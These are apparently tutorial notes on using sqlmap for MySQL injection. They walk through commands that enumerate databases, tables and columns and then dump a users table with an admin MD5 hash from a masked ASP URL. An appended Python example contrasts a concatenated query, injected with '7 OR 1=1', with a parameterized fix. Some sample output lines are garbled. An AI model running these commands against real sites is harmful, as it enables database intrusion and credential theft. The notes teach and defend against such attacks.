1. Determine whether the URL has an injection point:
sqlmap -u "http://abcd****efg.asp?id=7"
Suppose the database found is: student
available databases [1]:
[*]
2. Get the table names in the database:
sqlmap -u "http://abcd****efg.asp?id=7" -D student --tables
Suppose you find the table name: users
[INFO] retrieved: users
3. Get the names of the fields (columns) in the table:
sqlmap -u "http://abcd****efg.asp?id=7" -D student -T users --columns
Suppose you get the fields: id, username, password
[INFO] retrieved: id
[INFO] retrieved: int(3)
[INFO] retrieved: username
[INFO] retrieved: varchar( -)
[INFO] retrieved: password
[INFO] retrieved: varchar( -)
4. Dump the contents of the fields:
sqlmap -u "http://abcd****efg.asp?id=7" -D student -T users -C id,username,password --dump
Result:
[INFO] retrieved: 1
[INFO] retrieved: admin
[INFO] retrieved: 21232F297A57A5A743894A0E4A801FC3 (a 32-character MD5 hash)
Account: admin. Password: the dumped value is an MD5 hash, so the plaintext still has to be recovered from it.
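The whole walkthrough above works only because the id parameter is pasted into the SQL text. The following is an added example, not part of the original notes: it shows that bug and its fix side by side. It assumes a users table with the same id/username/password columns the notes enumerate, uses Python's sqlite3 in place of the ASP/MySQL backend so it runs offline (the concatenation defect and the parameterized fix look the same in any SQL driver), and all rows except the admin hash quoted above are constructed.

```python
import sqlite3

# Constructed sample data mirroring the schema enumerated in the notes.
# The admin hash is the value quoted on the page; the other rows are made up.
SAMPLE_ROWS = [
    (1, "admin", "21232F297A57A5A743894A0E4A801FC3"),
    (7, "alice", "<constructed-hash-1>"),
    (8, "bob", "<constructed-hash-2>"),
]


def make_db():
    """In-memory sqlite3 stand-in for the notes' MySQL 'student' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern sqlmap exploits in ?id=7: the request parameter is
    concatenated into the SQL text, so anything after the digits is run as SQL."""
    sql = "SELECT id, username FROM users WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, raw_id):
    """Fix: accept only a plain integer, then bind it as a parameter so the
    driver never interprets the value as SQL text."""
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, username FROM users WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "7"))         # [(7, 'alice')]
    print(lookup_vulnerable(db, "7 OR 1=1"))  # every row: the WHERE clause was rewritten
    print(lookup_hardened(db, "7"))           # [(7, 'alice')]
    try:
        lookup_hardened(db, "7 OR 1=1")
    except ValueError as err:
        print("rejected:", err)               # the hardened version never reaches the database
```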
sqlmap learning notes (2): MySQL injection